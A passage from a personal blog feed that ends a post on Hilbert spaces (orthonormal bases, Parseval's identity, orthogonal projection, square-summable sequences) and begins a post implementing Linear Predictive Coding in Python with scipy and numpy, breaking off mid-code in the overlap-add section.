Note that since an inner product can be used to define a norm (as we saw in <em>Normed Space</em>), a Hilbert space is also a Banach space, but the opposite is not necessarily true.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-06-26-hilbert-spaces/spaces-diagram.png" alt="Diagram depicting the relationship between different vector spaces" /> <figcaption>Figure 1: Diagram depicting the relationship between different vector spaces.</figcaption> </figure> <h2 id="bases-of-hilbert-spaces">Bases of Hilbert Spaces</h2> <p>We’ll now define the concept of bases for Hilbert spaces. Henceforth we’ll denote a Hilbert space by $H$.</p> <p>But before we start, let’s take a quick detour into topology.</p> <h3 id="dense-sets">Dense Sets</h3> <p>A set $S$ is considered <strong>closed</strong> if it contains all its limit points. One convenient way to characterize this in our case is that all convergent sequences have their limit in $S$.</p> <p>For example, the set of real numbers in the closed interval $[0, 1]$ is closed, whereas the open interval $]0, 1[$ is not, because the sequence $\frac{1}{n}$ has a limit 0, and 0 does not belong to it.</p> <p>The <strong>closure</strong> of a set $S$, which we’ll denote by $\bar S$, is $S$ plus the set of all its limit points. Another way to define closure is that it’s the smallest closed set that contains $S$.</p> <p>A subset $A$ of $S$ is called <strong>dense in</strong> $S$ if every point $x \in S$ is either in $A$ or is one of its limit points . In other words, $S$ is the closure of $A$. For example, the set of rationals $\mathbb{Q}$ is dense in $\mathbb{R}$, because every real number can be approximated arbitrarily well by a rational.</p> <h3 id="complete-vs-closed-metric-spaces">Complete vs. Closed Metric Spaces</h3> <p>It’s worth clarifying the difference between closedness and completeness in the context of metric spaces.
As we saw, a complete metric space $M$ is “closed” under Cauchy sequences, meaning that the limit of Cauchy sequences belongs to $M$.</p> <p>We can say a closed metric space $M$ is one “closed” under convergent sequences, meaning that the limit of convergent sequences belongs to $M$.</p> <p>All convergent sequences are Cauchy, so a complete metric space is also a closed metric space.</p> <h3 id="orthonormal-sets">Orthonormal Sets</h3> <p>Two vectors are <strong>orthogonal</strong> if their inner product equals 0. More precisely, if $\vec{u}, \vec{v} \in H$ and $\langle \vec{u}, \vec{v} \rangle = 0$ then $\vec{u}$ and $\vec{v}$ are orthogonal, also denoted by $\vec{u} \perp \vec{v}$.</p> <p>A subset $B \subseteq H$ is <strong>orthonormal</strong> if its elements are pairwise orthogonal and have unitary norm, that is, $\forall \vec{u}, \vec{v} \in B$ with $\vec{u} \ne \vec{v}$, $\vec{u} \perp \vec{v}$ and $\norm{\vec{u}} = 1$.</p> <h3 id="orthonormal-bases">Orthonormal Bases</h3> <p>A set $B \subseteq H$ is an <strong>orthonormal basis</strong> if it’s an orthonormal set and it’s complete. The latter means that the linear span $Sp$ of $B$ is dense in $H$.</p> <p>To unpack that a bit, the linear span of $B$ is defined as:</p> $Sp(B) = \bigg \{ \sum_{i=1}^{k} \lambda_i v_i | k \in \mathbb{N}, v_i \in B, \lambda_i \in F \bigg \}$ <p>Where $F$ is a scalar field. A set $B$ is said to be <strong>complete</strong> if $\overline{Sp(B)} = H$.</p> <h3 id="dimension">Dimension</h3> <p>The <strong>dimension</strong> of a space is the size of any of its bases.
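<p>In finite dimensions, the orthonormality conditions above are easy to verify numerically. A small sketch; the basis below is an illustrative choice:</p>

```python
import numpy as np

# A rotated orthonormal basis of R^2 (illustrative choice).
theta = 0.3
b1 = np.array([np.cos(theta), np.sin(theta)])
b2 = np.array([-np.sin(theta), np.cos(theta)])

# Pairwise orthogonality: the inner product of distinct elements is 0.
print(np.dot(b1, b2))  # 0.0

# Unitary norm for every element.
print(np.linalg.norm(b1), np.linalg.norm(b2))  # both ~1.0
```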
Because Hilbert spaces admit infinite dimensional vectors, it’s possible that the dimension is infinite!</p> <p>We’ll restrict ourselves to cases where the dimensions are <em>countable</em>, which is more general than the finite case.</p> <p>It’s possible to show that $H$ having a countable orthonormal base is equivalent to it being <strong>separable</strong>, that is, there is a countable subset $S$ dense in $H$.</p> <h3 id="vector-from-base">Vector from Base</h3> <p>Like in linear algebra, we can write any vector in $H$ as a linear combination of the vectors in the base $B$, $\vec{v_1}, \vec{v_2}, \cdots$:</p> $(2) \quad \vec{x} = \sum_{i=1}^{\infty} \lambda_i \vec{v_i}$ <p>Conversely the coefficients correspond to:</p> $(3) \quad \lambda_i = \langle \vec{v_i}, \vec{x} \rangle$ <h3 id="parsevals-identity">Parseval’s identity</h3> <p>The coefficients from the base above can be used to compute the norm of $\vec{x}$, like in linear algebra:</p> $(4) \quad \norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \abs{\lambda_i}^2$ <p>This is known as <strong>Parseval’s identity</strong>. We can arrive at this identity by recalling that the norm can be obtained from the inner product as (1):</p> $\norm{\vec{x}} = \sqrt{\langle \vec{x}, \vec{x} \rangle}$ <p>or</p> $\norm{\vec{x}}^2 = \langle \vec{x}, \vec{x} \rangle$ <p>if we replace the first $\vec{x}$ by (2),</p> $\norm{\vec{x}}^2 = \langle \sum_{i=1}^{\infty} \lambda_i \vec{v_i}, \vec{x} \rangle$ <p>since the inner product is conjugate-linear in the first argument, we can move the sum out and conjugate the scalar factors:</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \overline{\lambda_i} \langle \vec{v_i}, \vec{x} \rangle$ <p>we can then replace $\langle \vec{v_i}, \vec{x} \rangle$ by $\lambda_i$, per (3):</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \overline{\lambda_i} \lambda_i$ <p>which then leads to (4).
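<p>Parseval’s identity can be checked numerically in a small finite-dimensional example. A sketch using an orthonormal basis of $\mathbb{C}^2$ (an illustrative choice); note that numpy’s <code class="language-plaintext highlighter-rouge">vdot()</code> conjugates its first argument, matching the convention for $\lambda_i$ above:</p>

```python
import numpy as np

# An orthonormal basis of C^2 (illustrative choice).
v1 = np.array([1, 1]) / np.sqrt(2)
v2 = np.array([1, -1]) / np.sqrt(2)

x = np.array([3.0 + 1j, -2.0])

# Coefficients: lambda_i is the inner product of v_i and x.
# np.vdot conjugates its first argument.
lam = np.array([np.vdot(v1, x), np.vdot(v2, x)])

# Parseval: the squared norm equals the sum of squared coefficient moduli.
print(np.linalg.norm(x) ** 2)   # ~14.0
print(np.sum(np.abs(lam) ** 2))  # ~14.0
```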
Another way to state Parseval’s identity is to replace $\lambda_i$ with $\langle \vec{v_i}, \vec{x} \rangle$ instead of the opposite, which leads to:</p> $\norm{\vec{x}}^2 = \sum_{i=1}^{\infty} \abs{\langle \vec{v_i}, \vec{x} \rangle}^2$ <h3 id="bessels-inequality">Bessel’s inequality</h3> <p>Bessel’s inequality is a generalization of Parseval’s:</p> $\norm{\vec{x}}^2 \ge \sum_{i=1}^{N} \abs{\lambda_i}^2$ <p>It follows naturally from the fact that the sum on the right is over the subset $[1, N]$ of $[1, \infty]$ and each term is non-negative.</p> <h3 id="orthogonal-complement">Orthogonal Complement</h3> <p>Let $S$ be a closed subspace of $H$. Its <strong>orthogonal complement</strong> is defined as</p> $S^{\perp} = \{\vec{y} \in H | \langle \vec{y}, \vec{x} \rangle = 0, \, \forall \vec{x} \in S \}$ <p>For some geometric intuition, consider $\mathbb{R}^3$ with $S$ being the vectors in the xy plane, that is, those with $z = 0$. Then $S^{\perp}$ would be those perpendicular to the xy plane ($x = y = 0$).</p> <h3 id="orthogonal-projection">Orthogonal Projection</h3> <p>Let $S$ be a closed subspace of $H$. The <strong>orthogonal projection</strong> of $\vec{x}$ onto $S$ is a vector $\vec{x_S}$ that minimizes the distance from $\vec{x}$ to $S$. Note that $\vec{x}$ does not need to be in $S$.</p> <p>More formally, it’s</p> $(5) \quad \vec{x_S} = \mbox{argmin}_{\vec{y} \in S} \norm{\vec{x} - \vec{y}}$ <p>It’s possible to prove $\vec{x_S}$ exists and is unique.</p> <p>Going back to our geometry example, the orthogonal projection of a vector $(x, y, z)$ onto $z = 0$ is the vector $(x, y, 0)$.</p> <h3 id="the-projection-theorem">The Projection Theorem</h3> <p>Let $S$ be a closed subspace of $H$.
The theorem states that every $\vec{x} \in H$ can be written as $\vec{x} = \vec{x_S} + \vec{x}^{\perp}$, where $\vec{x_S}$ is the <strong>orthogonal projection</strong> of $\vec{x}$ onto $S$ and $\vec{x}^{\perp} \in S^{\perp}$.</p> <p>Going back to our geometry example, we can say that every vector in $\mathbb{R}^3$ can be expressed as the sum of a vector in the xy-plane and a vector perpendicular to it, or more specifically, $\vec{x} = (x, y, z)$, $\vec{x_S} = (x, y, 0)$ and $(0, 0, z) \in S^{\perp}$.</p> <h3 id="least-square-approximation-via-subspaces">Least Square Approximation via Subspaces</h3> <p>The idea is to approximate a vector of infinite dimension by one of finite dimension. Recall from (2) that for any $\vec{x} \in H$ and base $\vec{v_1}, \vec{v_2}, \cdots$:</p> $\quad \vec{x} = \sum_{i=1}^{\infty} \lambda_i \vec{v_i}$ <p>We can approximate $\vec{x}$ by taking the first $N$ terms, which we’ll denote by $\vec{x}^{[N]}$:</p> $\quad \vec{x}^{[N]} = \sum_{i=1}^{N} \lambda_i \vec{v_i}$ <p>It’s possible to show that $\vec{x}^{[N]}$ is the orthogonal projection of $\vec{x}$ onto $V_N = Sp(\vec{v_1}, \vec{v_2}, \cdots, \vec{v_N})$. Thus, by (5):</p> $\norm{\vec{x} - \vec{x}^{[N]}} = \min \{\norm{\vec{x} - \vec{y}} \mid \vec{y} \in V_N \}$ <p>since $\vec{y} \in V_N$, $\vec{y} = \sum_{i=1}^{N} \alpha_i \vec{v_i}$.
We can define an error function taking the $\alpha_i$ as parameters:</p> $E_N(\alpha_1, \cdots, \alpha_N) = \norm{\vec{x} - \sum_{i=1}^{N} \alpha_i \vec{v_i}}$ <p>The idea is then to find the values of the $\alpha$’s that minimize ${E_N}^2$ (least squares).</p> <h2 id="examples">Examples</h2> <h3 id="finite-euclidean-spaces">Finite Euclidean Spaces</h3> <p>We’ve seen that the Euclidean vector space is an inner product space (see <em>Inner Product Space</em>) and a complete metric space (see <em>Complete metric space</em>), so it’s a Hilbert space by definition.</p> <h3 id="polynomial-functions">Polynomial Functions</h3> <p>Most of the time when we talk about vector spaces we use scalars or vectors of scalars as examples, but nothing stops us from using other types of objects like functions. We can have a vector space of polynomial functions for example.</p> <p>A polynomial function of degree $N$ takes a variable $x$ in an interval $[a, b]$ and returns $\sum_{i = 0}^{N} \alpha_i x^i$ where $\alpha_i$ is a scalar from a field $F$. The set of polynomial functions of degree $N$ over a field $F$ can be denoted as $\mathbb{P}_N(F)$.</p> <p>The inner product of two polynomial functions $\vec{f}$ and $\vec{g}$ can be defined as:</p> $\langle \vec{f}, \vec{g} \rangle = \int_a^b \overline{f(x)} g(x) dx$ <p>This inner product is known as the $L^2[a, b]$ inner product.
It’s possible to show that the vector space $(\mathbb{P}_N(F), L^2[a, b])$ is a Hilbert one.</p> <h3 id="square-summable-sequences">Square Summable Sequences</h3> <p>One interesting advantage of building vector spaces based on properties like inner product instead of working directly with the actual vectors is that we can have vector spaces with infinite dimensions!</p> <p>Let $\mathbb{C}^{\infty}$ be the set of complex vectors with infinite dimensions and inner product:</p> $\langle \vec{x}, \vec{y} \rangle = \sum_{i=1}^{\infty} \bar{x_i} y_i$ <p>From that we can define the norm as:</p> $\norm{\vec{x}} = \sqrt{\sum_{i=1}^{\infty} \abs{x_i}^2}$ <p>Let $\ell^2$ be the subset of $\mathbb{C}^{\infty}$ for those that have finite norm, that is:</p> $\ell^2 = \{ \vec{x} \in \mathbb{C}^\infty \mid \sum_{i=1}^{\infty} \abs{x_i}^2 &lt; \infty \}$ <p>$\ell^2$ is also known as <strong>square summable sequences</strong>, since the elements of $$\vec{x} \in \ell^2$$ form a sequence that has a finite square sum.</p> <p>It’s possible to show $$\ell^2$$ is a Hilbert space.</p> <h2 id="conclusion">Conclusion</h2> <p>In this post we covered some topics around Hilbert spaces. I’m mostly interested in definitions and theorems, so I ended up skipping their proofs. Although there’s some geometric intuition to it, a lot of the content is still a bit over my head, and I’m hoping studying some of the applications in the future will help clarify things.</p> <p>My main motivation in studying these topics is to better understand the mathematics of signal processing.
I’ve started reading Prandoni and Vetterli’s <em>Signal Processing for Communications</em>, where they first discuss Hilbert spaces.</p> <p>This is my first foray into functional analysis and topology and it felt very hard to understand, but I love how much material about this subject is freely available on the internet!</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://en.wikipedia.org/wiki/Hilbert_space">1</a>] Hilbert space - Wikipedia</li> <li>[<a href="https://people.math.osu.edu/costin.10/602/Hilbert%20Spaces.pdf">2</a>] An Introduction To Hilbert Spaces, Costin.</li> <li>[<a href="https://en.wikipedia.org/wiki/Closed_set">3</a>] Closed set - Wikipedia</li> <li>[<a href="https://en.wikipedia.org/wiki/Closure_(topology)">4</a>] Closure (topology) - Wikipedia</li> <li>[<a href="https://en.wikipedia.org/wiki/Dense_set">5</a>] Dense set - Wikipedia</li> <li>[<a href="https://www.amazon.com/gp/product/B01FEKRY4A/">6</a>] Signal Processing for Communications, Prandoni and Vetterli.</li> </ul>Guilherme KunigamiIn this post we’ll study the Hilbert space, a special type of vector space that is often used as a tool in the study of partial differential equations, quantum mechanics, Fourier analysis.Linear Predictive Coding in Python2021-05-13T00:00:00+00:002021-05-13T00:00:00+00:00https://www.kuniga.me/blog/2021/05/13/lpc-in-python<!-- This needs to be define as included html because variables are not inherited by Jekyll pages --> <p>Linear Predictive Coding (LPC) is a method for estimating the coefficients of a Source-Filter model (post) from given data.</p> <p>The input consists of a time-series representing amplitudes of speech collected at fixed intervals over a period of time.</p> <p>The output is a matrix of coefficients corresponding to the source and filter model and is much more compact, so this method can be used for compressing audio.</p> <p>In this post we’ll study the encoding of an audio signal using LPC, which can
achieve 15x compression. We’ll then decode it into very noisy but intelligible speech.</p> <!--more--> <p>This study is largely based on Kim’s excellent <a href="https://ccrma.stanford.edu/~hskim08/lpc/">article</a>, which also provides the code in Matlab.</p> <p>The contributions of this post are:</p> <ul> <li>Use Python instead of Matlab. Reason: Matlab is not free - I know of Octave and used it for this post to understand differences between Python and Matlab APIs, but I also wanted to learn about the Python libraries.</li> <li>Start from the code and provide the theory behind it. Reason: As someone not familiar with signal processing, I found it non-trivial to go from the theory to the code, so I’m hoping this approach can be useful.</li> </ul> <h2 id="audio-processing">Audio Processing</h2> <p>In this section we’ll read the input signal from a file and pre-process it to a suitable format.</p> <h3 id="digital-audio">Digital Audio</h3> <p>Audio is a physical, analog phenomenon which must be represented digitally (discretely) in a computer.</p> <p>To convert an analog signal to a digital one, we need to obtain discrete samples. We usually work with the <strong>sample rate</strong>, the number of samples per second, which is given in Hertz. If we have too few samples, we’ll not correctly represent the signal. If we have too many, we’ll end up using more storage than needed. As an example, the sample rate of CD-quality audio is 44.1 kHz, that is, 44,100 samples per second.</p> <h3 id="audio-format-vs-file-format">Audio Format vs File Format</h3> <p>These terminologies can be confusing since they’re often used interchangeably. File formats are the user-facing ones, for example WAV (<em>Waveform Audio File Format</em>) and MP3 (<em>MPEG-2 Audio Layer III</em>).
They have an associated file extension, for example <code class="language-plaintext highlighter-rouge">.wav</code> and <code class="language-plaintext highlighter-rouge">.mp3</code>.</p> <p>The audio format is associated to how audio data is represented (encoded) in a file. We have PCM (<em>Pulse-code modulation</em>) which is how WAV encodes its data, and MP3 which is both an audio and file format.</p> <p>Some file formats can work with multiple audio formats, for example the MP4 file format, which supports audio formats like ALS, MP3 and many others.</p> <p>To make it more clear, when we’re referring to file formats we’ll use the extension (<code class="language-plaintext highlighter-rouge">.mp3</code>).</p> <h3 id="reading-wav-file">Reading .wav file</h3> <p>We’re ready for our very first task: read a <code class="language-plaintext highlighter-rouge">.wav</code> file to memory. We can use the scipy library:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">scipy.io.wavfile</span> <span class="p">...</span> <span class="p">[</span><span class="n">sample_rate</span><span class="p">,</span> <span class="n">pcm_data</span><span class="p">]</span> <span class="o">=</span> <span class="n">scipy</span><span class="p">.</span><span class="n">io</span><span class="p">.</span><span class="n">wavfile</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="s">'lpc/audio/speech.wav'</span><span class="p">)</span></code></pre></figure> <p>The <code class="language-plaintext highlighter-rouge">read()</code> function returns the sample rate in which the file is encoded and the data itself. 
For this post we’ll assume our audio has a single channel so that <code class="language-plaintext highlighter-rouge">pcm_data</code> is simply an array containing the amplitude of each sample.</p> <h3 id="numpy-arrays">Numpy Arrays</h3> <p>We’ll be using numpy a lot for matrix operations, so it’s better to work with numpy data structures at all times, hence the <code class="language-plaintext highlighter-rouge">np.array()</code> conversion.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">import</span> <span class="nn">numpy</span> <span class="k">as</span> <span class="n">np</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span></code></pre></figure> <p><strong>Dimensions.</strong> One of the critical parts of working with numpy arrays is understanding their dimensions. Numpy arrays are multi-dimensional, which can be inspected via the <code class="language-plaintext highlighter-rouge">shape</code> attribute.
Some examples:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># 10 x 20 matrix </span><span class="n">m</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">empty</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">20</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (10, 20) # vector of size 10 </span><span class="n">v</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">empty</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="mi">10</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">v</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (10, ) # 10 x 1 matrix </span><span class="n">m</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">empty</span><span class="p">(</span><span class="n">shape</span><span class="o">=</span><span class="p">(</span><span class="mi">10</span><span class="p">,</span> <span class="mi">1</span><span class="p">))</span> <span class="k">print</span><span class="p">(</span><span class="n">m</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (10, 1)</span></code></pre></figure> <p>Note the difference between the 1 dimensional vector <code class="language-plaintext highlighter-rouge">(10, )</code> and the 2 dimensional matrix with one column <code class="language-plaintext highlighter-rouge">(10, 1)</code>.</p> <p>Let’s inspect our <code class="language-plaintext 
highlighter-rouge">amplitudes</code>:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">print</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">.</span><span class="n">shape</span><span class="p">)</span> <span class="c1"># (530576, )</span></code></pre></figure> <p>which shows it’s a vector with ~500k elements.</p> <h3 id="normalizing-amplitude">Normalizing Amplitude</h3> <p>We want to work with amplitudes within [-1.0, 1.0] so it’s easier to visualize and compare signals.</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">amplitudes</span> <span class="o">=</span> <span class="mf">0.9</span><span class="o">*</span><span class="n">amplitudes</span><span class="o">/</span><span class="nb">max</span><span class="p">(</span><span class="nb">abs</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">))</span></code></pre></figure> <p>Numpy arrays work with list functions like <code class="language-plaintext highlighter-rouge">max()</code> and <code class="language-plaintext highlighter-rouge">abs()</code>. 
It also differs from regular lists in operators like <code class="language-plaintext highlighter-rouge">*</code> and <code class="language-plaintext highlighter-rouge">/</code>, where it performs the operation element-wise:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="c1"># Python list </span><span class="p">[</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">]</span><span class="o">*</span><span class="mi">3</span> <span class="c1"># [1, 2, 1, 2, 1, 2] </span> <span class="c1"># Numpy array </span><span class="n">np</span><span class="p">.</span><span class="n">array</span><span class="p">([</span><span class="mi">1</span><span class="p">,</span> <span class="mi">2</span><span class="p">])</span><span class="o">*</span><span class="mi">3</span> <span class="c1"># np.array([3, 6])</span></code></pre></figure> <p>A tricky aspect of numpy functions is understanding when there are changes in dimensions.
We can do a careful inspection of the operations:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="n">s1</span> <span class="o">=</span> <span class="n">amplitudes</span> <span class="c1"># original array (N, ) </span><span class="n">s2</span> <span class="o">=</span> <span class="nb">abs</span><span class="p">(</span><span class="n">s1</span><span class="p">)</span> <span class="c1"># preserves dimension (N, ) </span><span class="n">s3</span> <span class="o">=</span> <span class="nb">max</span><span class="p">(</span><span class="n">s2</span><span class="p">)</span> <span class="c1"># scalar </span><span class="n">s4</span> <span class="o">=</span> <span class="mf">0.9</span><span class="o">*</span><span class="n">s1</span> <span class="c1"># preserves dimension (N, ) </span><span class="n">s5</span> <span class="o">=</span> <span class="n">s4</span> <span class="o">/</span> <span class="n">s3</span> <span class="c1"># preserves dimension (N, )</span></code></pre></figure> <h3 id="downsampling">Downsampling</h3> <p>We can display the sample rate from the audio file:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">print</span><span class="p">(</span><span class="n">sample_rate</span><span class="p">)</span> <span class="c1"># 44100</span></code></pre></figure> <p>which is the common 44.1 kHz. We want to downsample it to 8 kHz. The article doesn’t explain exactly why, but it seems like 8 kHz is enough granularity to represent the frequency range of human speech. More importantly, lower sample rates generate fewer samples, which makes the model smaller.</p> <p>The <code class="language-plaintext highlighter-rouge">scipy.signal.resample()</code> function requires the original samples and the number of desired output samples.
In Matlab’s <code class="language-plaintext highlighter-rouge">resample()</code> it takes instead the original sample rate and target sample rate, which is more convenient, but we can do the math:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="kn">from</span> <span class="nn">scipy.signal</span> <span class="kn">import</span> <span class="n">resample</span> <span class="n">target_sample_rate</span> <span class="o">=</span> <span class="mi">8000</span> <span class="n">target_size</span> <span class="o">=</span> <span class="nb">int</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">)</span><span class="o">*</span><span class="n">target_sample_rate</span><span class="o">/</span><span class="n">sample_rate</span><span class="p">)</span> <span class="n">amplitudes</span> <span class="o">=</span> <span class="n">resample</span><span class="p">(</span><span class="n">amplitudes</span><span class="p">,</span> <span class="n">target_size</span><span class="p">)</span> <span class="n">sample_rate</span> <span class="o">=</span> <span class="n">target_sample_rate</span></code></pre></figure> <h2 id="divide-and-conquer">Divide and Conquer</h2> <p>As we saw in the <a href="https://www.kuniga.me/blog/2021/04/03/source-filter-model.html">Source-Filter Model post</a>, it can be used to represent a single constant sound like the phoneme <code class="language-plaintext highlighter-rouge">/a/</code>.</p> <p>To represent a full speech, we’ll need to chunk the samples in small blocks such that within each block there is a single phoneme being voiced.</p> <p>Note that it doesn’t matter if we end up splitting a single phoneme into multiple blocks, but we probably don’t want to use too small of a block because it makes the model bigger.</p> <h3 id="overlap-add-method-ola">Overlap-Add Method (OLA)</h3> <p>If we split our signal into disjoint windows and solve 
them individually, when we try to decode and reconstruct the signal we might end up with abrupt transitions: say the model at block $i$ is <code class="language-plaintext highlighter-rouge">/a/</code> and at block $i+1$ is <code class="language-plaintext highlighter-rouge">/o/</code>; it will not capture the smooth transition that happens in reality when we change our mouth when voicing <code class="language-plaintext highlighter-rouge">/a/</code> followed by <code class="language-plaintext highlighter-rouge">/o/</code>.</p> <p>To account for this, we split the signal into overlapping blocks. We also use a weight function that favors samples in the middle of the block, because the ones at the extremities will overlap into the neighboring blocks.</p> <p>Let $x$ be our input signal (i.e. an array of samples) and $n$ its size. Let our window function be represented by an array of weights $w$, and $n_w$ its size.</p> <p>The first block of our signal would be $B_1 = (x_1, \cdots, x_{n_w})$. Applying the weight function is simply doing an element-wise multiplication: $\hat B_1 = (x_1 w_1, \cdots, x_{n_w} w_{n_w})$.</p> <p>Let $R \in [0, 1.0]$ be the overlap ratio, with 0 meaning no overlap and 1.0 meaning 100% overlap. We can find out where the next block starts by computing the step $\Delta$:</p> $\Delta = n_w (1 - R)$ <p>To see why, suppose our current block offset is $i$. If there’s no overlap, the next block offset is $i + n_w$, but when there’s $R$ overlap, we need to include that much in the next block, so our next offset is reduced accordingly to $i + n_w - R n_w$.</p> <p>So for our second weighted block we’d have: $\hat B_2 = (x_{1 + \Delta} w_1, \cdots, x_{n_w + \Delta} w_{n_w})$.</p> <p>We can generalize for the $j$-th weighted block:</p> $\hat B_j = (x_{1 + (j - 1) \Delta} w_1, \cdots, x_{n_w + (j - 1) \Delta} w_{n_w})$ <p><em>Figure 1</em> shows a visualization of a signal and 4 consecutive overlapping windows.
Note how the amplitude at the extremities of the windows is attenuated compared to the original signal.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-05-13-lpc-in-python/ola.png" alt="5 line charts, the first showing the full signal, the others windows from it" /> <figcaption>Figure 1: Signal and overlapping windows.</figcaption> </figure> <p>How many blocks $n_b$ do we have? The index of the last sample in the last block is $n_w + (n_b - 1) \Delta$, which might not coincide with the last sample in the original signal. We can either pad the end of the signal with 0s or truncate the trailing samples of the signal. If we do the latter, then we’ll get:</p> $n_b = \lfloor \frac{n - n_w}{\Delta} \rfloor + 1$ <p>We can implement these ideas in Python, remembering that we use 0-indexed arrays:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">create_overlapping_blocks</span><span class="p">(</span><span class="n">x</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">R</span> <span class="o">=</span> <span class="mf">0.5</span><span class="p">):</span> <span class="n">n</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">x</span><span class="p">)</span> <span class="n">nw</span> <span class="o">=</span> <span class="nb">len</span><span class="p">(</span><span class="n">w</span><span class="p">)</span> <span class="n">step</span> <span class="o">=</span> <span class="n">floor</span><span class="p">(</span><span class="n">nw</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="n">R</span><span class="p">))</span> <span class="n">nb</span> <span class="o">=</span> <span class="n">floor</span><span class="p">((</span><span class="n">n</span> <span class="o">-</span> <span class="n">nw</span><span 
class="p">)</span> <span class="o">/</span> <span class="n">step</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="n">B</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">nb</span><span class="p">,</span> <span class="n">nw</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">nb</span><span class="p">):</span> <span class="n">offset</span> <span class="o">=</span> <span class="n">i</span> <span class="o">*</span> <span class="n">step</span> <span class="n">B</span><span class="p">[</span><span class="n">i</span><span class="p">,</span> <span class="p">:]</span> <span class="o">=</span> <span class="n">w</span> <span class="o">*</span> <span class="n">x</span><span class="p">[</span><span class="n">offset</span> <span class="p">:</span> <span class="n">nw</span> <span class="o">+</span> <span class="n">offset</span><span class="p">]</span> <span class="k">return</span> <span class="n">B</span></code></pre></figure> <p>A given index$i$from the input signal will show up in one or more blocks, and in each of them it will be multiplied by the corresponding weight. More precisely, if it belongs to block$j$, the weight$x_i$was multiplied by is$w_{i - (j - 1) \Delta}$.</p> <p>Let$S_i$be the set of all block indices to which index$i$belongs. 
The sum of the weighted $x_i$ across all blocks it belongs to is given by:</p> $\sum_{j \in S_i} x_i w_{i - (j - 1) \Delta} = x_i \sum_{j \in S_i} w_{i - (j - 1) \Delta}$ <p>If we choose our weight function $w$ such that</p> $\sum_{j \in S_i} w_{i - (j - 1) \Delta} = 1 \qquad \forall i$ <p>Then we can recover the original signal from the individual blocks by adding the right indices, which is the <em>Add</em> part of <em>Overlap-Add</em>.</p> <p>We can write a function to perform this:</p> <figure class="highlight"><pre><code class="language-python" data-lang="python"><span class="k">def</span> <span class="nf">add_overlapping_blocks</span><span class="p">(</span><span class="n">B</span><span class="p">,</span> <span class="n">w</span><span class="p">,</span> <span class="n">R</span> <span class="o">=</span> <span class="mf">0.5</span><span class="p">):</span> <span class="p">[</span><span class="n">count</span><span class="p">,</span> <span class="n">nw</span><span class="p">]</span> <span class="o">=</span> <span class="n">B</span><span class="p">.</span><span class="n">shape</span> <span class="n">step</span> <span class="o">=</span> <span class="n">floor</span><span class="p">(</span><span class="n">nw</span> <span class="o">*</span> <span class="p">(</span><span class="mi">1</span> <span class="o">-</span> <span class="n">R</span><span class="p">))</span> <span class="n">n</span> <span class="o">=</span> <span class="p">(</span><span class="n">count</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="o">*</span> <span class="n">step</span> <span class="o">+</span> <span class="n">nw</span> <span class="n">x</span> <span class="o">=</span> <span class="n">np</span><span class="p">.</span><span class="n">zeros</span><span class="p">((</span><span class="n">n</span><span class="p">,</span> <span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="n">count</span><span class="p">):</span> <span 
